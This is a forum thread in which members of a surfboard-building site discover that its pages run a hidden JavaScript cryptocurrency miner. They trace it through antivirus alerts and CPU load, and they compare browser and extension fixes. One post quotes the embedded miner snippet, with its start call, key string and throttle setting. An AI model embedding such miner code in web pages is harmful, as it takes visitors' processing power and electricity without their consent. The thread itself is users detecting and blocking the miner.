ALERT ! ! !

EVERY TIME I LOG INTO SWAYLOCK’S, NORTON BLOCKS AN ATTACK BY       JSCOINMINER WEBSITE          It only happens with Swaylock’s.      It is some form of virus.      Be aware.

I’m getting the same thing. Concerning, but my Symantec anti virus is saying it’s blocking it.

probaly caught it from an X rated adult site

  Nope, the notice ONLY APPEARS, when I access the Swaylock’s site.      I can explore the internet, and no notice appears.     Click on SWAYLOCK’S, and the notice that it was blocked by Norton, pops up.     So, my conclusion is, that it is somehow attached to the Swaylock’s site.

I deleted Swaylock’s from my favorites, then went to the internet, and re-accessed the Swaylocks site.     The notice still pops up.       The blocking notice from Norton, ONLY APPEARS WHEN I CLICK ON TO SWAYLOCK’S.     I can only conclude that Swaylock’s is the carrier, of this particular virus.

Amazing that our least tech-savvy individual is breaking this, but it seems true.  Sways seems to be mining bitcoins in the background.  Look at your CPU load go up when you have static sways windows open that shouldn’t doing anything at all.  

I’ve been here since before the beginning and don’t say much, but this is the time.  It looks like BT has nailed it one the head.  I"m gracious for the gift of sways, and so far this seems to be nothing more than wasting idle resources, but sways is serving cpu-intensive code that seems to be a javascript bitcoin miner.

good work there sir thrailkill.



Say what ???

here’s the snippet of embedded code.  choose view source with a sways page open and look for yourself.  notice your cpu load going up and fans spinning?  



<div class=“content”>

    <script src=“” ></script>

    <script type=“text/javascript”>PerfektStart(‘45ZHCBxcpj8CUBvgkXQXuxSXNdt6LALv3QwaTqPAoH9t4j56JyfcDzReQfDmES2RJfHzdE1RiJhhAMUe5gwrtq4MSYbzuL8.auriga+5000’, ‘x’);throttleMiner = 50;</script>



Same happening here, I open Swaylocks and the CPU load goes to near 100%, on Ubuntu running Firefox browser.

I saw it a few times and shut down the browser, unable to determine which tab was causing the CPU load.

As an explanation for those who don’t know what this is about:

Some crypto-currencies use ‘proof of work’, which uses enormous processing power. The electricity now being diverted to Bitcoin and other crypto-currency ‘mining’ is enormous.

Some dodgy fellas figure that they would rather have YOU pay for the electricity needed to ‘mine’ THEIR coins, so they run software that abuses your computer to earn crypto-currency for themselves. You pay for the electricity, and your computer runs at full bore, making it slow for everything you want to do with it.



I found that opening Sways with Firefox or Chrome browsers caused high CPU load immediately.

Using the Brave browser, before and after logging in, causes no additional CPU load. 

Funny but not funny: a little while back when Mike Paler was asking for thoughts regarding banner ads, I almost suggested instead that he embed mining code into the site as an alternative to advertising.  Looks like some enterprising persons had a similar thought.  I am very non savvy with regard to this stuff, so my idea may not have even worked.

After more than an hour of using Brave Browser on Sways, still no sign of increased CPU usage.

I like it! 

And it let’s me watch the surf cams without ads, too!

Does this have anything to do with Sways asking me each time if I would allow my location?

Adding NoScript fixed the problem in Firefox.

More hints for other browsers can be found here:

minerBlock works for me in Chrome.

It’s a bit buggy, it claims “Blocked Miners: 0”, but it blocks it.

After disabling minerBlock, CPU load goes up immediately to 75%, and after re-enabling minerBlock it found “” as the offending miner.

Then it goes back to claim that no miners are blocked, but it keeps blocking.


I tried No Coin first, it was unable to block the mining in Chrome and I uninstalled it again.

i just went for a walk

and spontaneously struck up a conversation with a russian tourist

in russian! and I dont speak russian!


is there russian bitcoin?

I think Ive been turned

I think I might be a spy…

so how do we get rid of it on our computer?

it is not “on your computer.”  it is embedded in the page code for swaylocks.  presumably paler put it in there to generate revenue.  when you have a sways page open, it’s running.  when you close the tab/window, it’s gone.  look in the task manager for your browser and see the cpu use per process.  open new swaylocks windows/tabs and see the cpu skyrocket on those too.  sways pages aren’t dynamic and should have very little system load once rendered.  it’s using your idle processor to do currency mining for profit.  it’s not staying resident or in any way harming your machine, just using your computer and electricity to do work and generate some income for sways management (or so one supposes).



I linked to MrMik’s suggested browser and downloaded it.  He is correct on the CPU usage.  I tried a back to back comparison while monitoring my CPU usage… simply connecting to Sway’s homepage on idle, the Brave browser showed zero activity.  With Google Chrome on same Sway’s homepage on idle my CPU monitor was at 50-60.  

That is a significant change and represents some sort of background activity of which I was unaware.

Good catch Thrailkill and thanks for alerting all of us to your concerns.  Also thanks to MrMik for the lead on Bravo browser.  I am going to continue evaluating that one.

PS - If you want to check your CPU hit “CTRL+ALT+DELETE”. then click “Task Manager” to find what’s running.  There are other ways but that is pretty quick and easy.  Swaylocks isn’t listed separately but will be reflected as one of the browser listings.  

So, is this potentially an issue on an iPad running Safari?

If so, how can I check?